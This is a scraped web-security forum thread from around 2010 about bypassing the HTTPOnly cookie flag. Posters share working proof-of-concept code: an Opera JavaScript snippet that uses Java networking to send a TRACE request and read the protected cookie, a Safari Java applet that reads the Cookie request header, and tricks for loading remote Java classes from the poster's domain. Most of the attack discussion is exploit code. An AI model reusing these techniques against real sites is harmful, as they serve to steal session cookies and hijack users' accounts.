how bypass a HTTPOnly ? hi all, i have question. how bypass httponly,i think by Cross Site Tracing,but i dont confident thanks http://sla.ckers.org/forum/read.php?2,33037,33037#msg-33037 Wed, 19 Jun 2013 21:21:40 -0500 Phorum 5.2.15a http://sla.ckers.org/forum/read.php?2,33037,33490#msg-33490 Re: how bypass a HTTPOnly ? http://sla.ckers.org/forum/read.php?2,33037,33490#msg-33490
new Packages.asdf.asdf.asdf();

makes a request for

/asdf/asdf/asdf.class

haha.. and this:

javascript:alert(new Packages["//sirdarckcat.asdf.asdf"].asdf())

loads

eaea.sirdarckcat.net/asdf/asdf/asdf.class

gotta love opera xDDD]]> sirdarckcat XSS Info Wed, 17 Feb 2010 08:25:24 -0600 http://sla.ckers.org/forum/read.php?2,33037,33481#msg-33481 Re: how bypass a HTTPOnly ? http://sla.ckers.org/forum/read.php?2,33037,33481#msg-33481 rvdh XSS Info Tue, 16 Feb 2010 21:15:40 -0600 http://sla.ckers.org/forum/read.php?2,33037,33422#msg-33422 Re: how bypass a HTTPOnly ? http://sla.ckers.org/forum/read.php?2,33037,33422#msg-33422 sirdarckcat XSS Info Sat, 13 Feb 2010 13:47:55 -0600 http://sla.ckers.org/forum/read.php?2,33037,33419#msg-33419 Re: how bypass a HTTPOnly ? http://sla.ckers.org/forum/read.php?2,33037,33419#msg-33419
Quote
sdc
then, the opera one is a cross site tracing vuln
It's obvious! hahaha

Fixed in Opera 10.50!!!]]> LeverOne XSS Info Sat, 13 Feb 2010 09:05:07 -0600 http://sla.ckers.org/forum/read.php?2,33037,33418#msg-33418 Re: how bypass a HTTPOnly ? http://sla.ckers.org/forum/read.php?2,33037,33418#msg-33418 sirdarckcat XSS Info Sat, 13 Feb 2010 07:52:48 -0600 http://sla.ckers.org/forum/read.php?2,33037,33417#msg-33417 Re: how bypass a HTTPOnly ? http://sla.ckers.org/forum/read.php?2,33037,33417#msg-33417 code.google.com]) and this article ([forum.antichat.ru], in Russian, 7 months ago).

The essence of ways:

1. Opera: 

<?php
header("Set-Cookie: hidden=value; httpOnly");
?>

<script>

alert("Cookie: "+document.cookie);

function javacon(url)
{
 javaurl = new java.net.URL(url);
 conn = javaurl.openConnection();
 conn.setRequestMethod('TRACE');
 var response = '';
 input = conn.getInputStream();
 var lnr = new java.io.LineNumberReader(new java.io.InputStreamReader(input));
 while ((n = lnr.readLine()) != null) response += n + '\n ';
 return response;
}
 
alert(javacon(location.href+'.txt'));

</script>

2. Safari

RequestProperty.java 
import java.applet.*;
import java.net.*;
import java.io.*;

public class RequestProperty extends Applet 
{
 public void start() 
 {
  try {
       URL url = getCodeBase();
       HttpURLConnection conn = (HttpURLConnection) url.openConnection();
       InputStream inp;
       try {
            conn.getInputStream();    // method GET
           }
       catch (IOException ee)
           {
            conn.getErrorStream();
           }
       String cookie = conn.getRequestProperty("Cookie");
       getAppletContext().showDocument(new URL("javascript:alert('"+cookie+"');"));
      }
  catch (Exception e){}
 }
}

<applet code=RequestProperty.class width=1 height=1></applet>

LeverOne]]> LeverOne XSS Info Sat, 13 Feb 2010 06:57:19 -0600 http://sla.ckers.org/forum/read.php?2,33037,33039#msg-33039 Re: how bypass a HTTPOnly ? http://sla.ckers.org/forum/read.php?2,33037,33039#msg-33039 p0deje XSS Info Thu, 14 Jan 2010 10:11:41 -0600 http://sla.ckers.org/forum/read.php?2,33037,33038#msg-33038 Re: how bypass a HTTPOnly ? http://sla.ckers.org/forum/read.php?2,33037,33038#msg-33038 it's better to use AJAX with getAllResponseHeaders(), but it again will work not in all browsers

look there http://www.webappsec.org/lists/websecurity/archive/2006-05/msg00025.html
first result in google]]> p0deje XSS Info Thu, 14 Jan 2010 10:07:27 -0600 http://sla.ckers.org/forum/read.php?2,33037,33037#msg-33037 how bypass a HTTPOnly ? http://sla.ckers.org/forum/read.php?2,33037,33037#msg-33037
i have question.

how bypass httponly,i think by Cross Site Tracing,but
i dont confident

thanks]]> the_master XSS Info Thu, 14 Jan 2010 09:56:10 -0600